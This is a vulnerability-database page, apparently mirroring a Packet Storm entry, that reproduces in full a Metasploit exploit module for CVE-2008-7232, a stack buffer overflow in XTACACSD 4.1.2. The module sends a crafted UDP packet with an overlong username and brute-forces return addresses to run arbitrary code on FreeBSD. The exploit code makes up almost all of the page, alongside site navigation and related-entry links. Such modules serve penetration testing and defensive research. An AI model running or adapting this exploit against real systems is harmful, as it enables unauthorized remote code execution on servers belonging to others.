Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormMCPACKETSTORM:82227
HistoryOct 27, 2009 - 12:00 a.m.

XTACACSD 4.1.2 Buffer Overflow

2009-10-2700:00:00
MC
packetstormsecurity.com
23

EPSS

0.505

Percentile

97.5%

JSON
`##  
# $Id$  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to   
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
require 'msf/core'  
  
  
class Metasploit3 < Msf::Exploit::Remote  
  
include Msf::Exploit::Remote::Udp  
include Msf::Exploit::Brute  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'XTACACSD <= 4.1.2 report() Buffer Overflow',  
'Description' => %q{  
This module exploits a stack overflow in XTACACSD <= 4.1.2. By  
sending a specially crafted XTACACS packet with an overly long  
username, an attacker may be able to execute arbitrary code.   
},  
'Author' => 'MC',  
'Version' => '$Revision$',  
'References' =>   
[   
['CVE', '2008-7232'],  
['OSVDB', '58140'],  
['URL', 'http://aluigi.altervista.org/adv/xtacacsdz-adv.txt'],  
],  
'Payload' =>  
{  
'Space' => 175,  
'BadChars' => "\x00\x09\x0a\x0b\x0c\x0d\x20",  
'StackAdjustment' => -3500,  
'PrependEncoder' => "\x83\xec\x7f",  
'DisableNops' => 'True',  
},  
'Platform' => 'BSD',  
'Arch' => ARCH_X86,   
'Targets' =>  
[  
['FreeBSD 6.2-Release Bruteforce',  
{'Bruteforce' =>  
{  
'Start' => { 'Ret' => 0xbfbfea00 },  
'Stop' => { 'Ret' => 0xbfbfef00 },  
'Step' => 24,  
}  
},  
],  
],  
'Privileged' => true,  
'DefaultTarget' => 0,  
'DisclosureDate' => 'Jan 8 2008'))  
  
register_options([Opt::RPORT(49)], self.class)  
  
end  
  
def brute_exploit(address)  
connect_udp  
  
sploit = "\x80" # Version  
sploit << "\x05" # Type: Connect  
sploit << "\xff\xff" # Nonce  
sploit << "\xff" # Username length  
sploit << "\x00" # Password length  
sploit << "\x00" # Response  
sploit << "\x00" # Reason  
sploit << "\xff\xff\xff\xff" # Result 1  
sploit << "\xff\xff\xff\xff" # Destination address  
sploit << "\xff\xff" # Destination port  
sploit << "\xff\xff" # Line  
sploit << "\x00\x00\x00\x00" # Result 2  
sploit << "\x00\x00" # Result 3  
sploit << make_nops(238 - payload.encoded.length)  
sploit << payload.encoded + [address['Ret']].pack('V')   
  
print_status("Trying target #{target.name} #{"%.8x" % address['Ret']}...")   
udp_sock.put(sploit)  
  
disconnect_udp   
end  
  
end  
  
  
`

Related

prion 1
exploitdb 2
seebug 1
cve 1
nvd 1
metasploit 1
cvelist 1
prion
prion
Buffer overflow
2009-09-14 14:30:00
exploitdb
exploitdb
Xtacacsd 4.1.2 - &#039;report()&#039; Remote Buffer Overflow (Metasploit)
2008-01-08 00:00:00
XTACACSD <= 4.1.2 report Buffer Overflow
2010-05-09 00:00:00
seebug
seebug
Xtacacsd &lt;= 4.1.2 report Buffer Overflow
2008-01-08 00:00:00
cve
cve
CVE-2008-7232
2009-09-14 14:30:00
nvd
nvd
CVE-2008-7232
2009-09-14 14:30:00
metasploit
metasploit
XTACACSD report() Buffer Overflow
2008-02-02 16:06:39
cvelist
cvelist
CVE-2008-7232
2009-09-14 14:00:00

EPSS

0.505

Percentile

97.5%

JSON
Related for PACKETSTORM:82227
prion1exploitdb2seebug1cve1nvd1metasploit1cvelist1